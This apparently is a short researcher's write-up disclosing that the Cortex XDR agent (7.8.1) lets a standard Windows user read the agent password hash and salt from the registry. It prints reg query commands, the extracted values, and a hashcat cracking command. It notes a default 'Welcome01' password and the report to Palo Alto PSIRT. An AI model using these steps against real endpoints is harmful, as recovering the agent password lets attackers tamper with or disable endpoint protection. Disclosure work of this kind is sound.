Reading Time: 2 minutes

Since Mr. D0x post on XDR :

things have improved.

Palo Alto has introduced an cipher to crypt the techsupport file. Password to be calculated via a private key in the tenant WebUI.

So in other words, a standard user cannot read the tech support file.

I’m running latest version 7.8.1

The password hash and salt have been moved ( ? ) to the registry seems like.

The ACLs grants a standard users to view the values and therefor extract those values

C:\Users>reg query HKEY_LOCAL_MACHINE\SYSTEM\Cyvera\Policy\Organization\Settings /v PasswordHash

    PasswordHash    REG_BINARY    93F0E81F4BDC12361E19B5339398A5F9A8B760C1F91B43B73984FCAC98C3E4D24F5039B065D6FCFC9750D4F9BE57E8CBEBF8923AB4D0865BDF9D7585C9A6B23E

C:\Users>reg query HKEY_LOCAL_MACHINE\SYSTEM\Cyvera\Policy\Organization\Settings /v PasswordSalt

    PasswordSalt    REG_BINARY    3962333937376131643532383231366336316363336433376563366663333239323938373539363631666135633630663861393230626331366264376435373237343565396130653739343236646331623338333139663237396534363062303435326630386263626638333432376235636437353535313438613030623035
or with reg query HKEY_LOCAL_MACHINE\SYSTEM\Cyvera\Policy\Organization\Settings | findstr Password

Decoding the Hex Value and encoding into Base64 to meet hashcat’s inputs format of hashes

From HEX + To Base64
C:\temp\hashcat-6.2.5>hashcat.exe -m 12100 xdr2.txt rockyou.txt -d 1 --show


This issue has been reported to PaloAlto PSIRT and acknowledge by them on the 8 July 2022.

In the initial report, I also mentioned you could get the values from the techsupport file as there is a dump of the registry included and that point has been sorted.

Seems to me they left a not so small information disclosure.

Note : XDR WebUi is now forcing all new passwords set to be at least 9 characters, but this will not push old customer to change their old passwords or to remove the Welcome01 password (to my understanding)